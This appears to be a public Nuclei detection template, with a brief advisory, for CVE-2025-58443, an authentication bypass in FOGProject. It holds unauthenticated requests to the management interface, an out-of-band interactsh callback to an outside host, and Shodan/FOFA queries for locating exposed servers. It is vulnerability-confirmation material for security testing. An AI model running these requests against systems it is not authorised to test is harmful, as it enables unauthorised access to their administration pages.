FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
PoC code [public]
id: CVE-2025-58443

info:
  name: FOGProject <= 1.5.10.1673 - Authentication Bypass
  author: oleveloper
  severity: critical
  description: |
    FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.
  reference:
    - https://github.com/casp3r0x0/CVE-2025-58443
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58443
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2025-58443
    epss-score: 0.08967
    epss-percentile: 0.9225
    cwe-id: CWE-287
  metadata:
    max-request: 3
    vendor: fogproject
    product: fogproject
    fofa-query: icon_hash="-1952619005"
    shodan-query: http.favicon.hash:-1952619005
  tags: cve,cve2025,fogproject,auth-bypass

# Request 2 only runs if request 1 matched.
flow: http(1) && http(2)

http:
  # Request 1: fingerprint the FOG web interface (internal matcher, not reported on its own).
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'FOG')"
          - "status_code == 200"
        condition: and
        internal: true

  # Request 2: request two endpoints without a session; either matcher is sufficient.
  - method: GET
    path:
      - "{{BaseURL}}/fog/management/index.php?node=about&sub=kernel"
      - "{{BaseURL}}/fog/service/getversion.php?url={{interactsh-url}}"

    matchers-condition: or
    matchers:
      # HTTP 200 together with a DNS interaction on the interactsh URL.
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(interactsh_protocol,'dns')"
        condition: and

      # HTTP 200 with the kernel configuration page present in the response body.
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('(?is)FOG.*Configuration.*(?:Kernel|bzImage)', body)"
        condition: and
# digest: 4b0a00483046022100a441637ec244919dfde19b4840cd374ab07b54b69bb57b60dc3bb5d3111e1337022100e4f2a6bf738f94d026aa09f232563fe000692506af7ab5e37ea9e2725e431c22:922c64590222798bb761d5b6d8e72950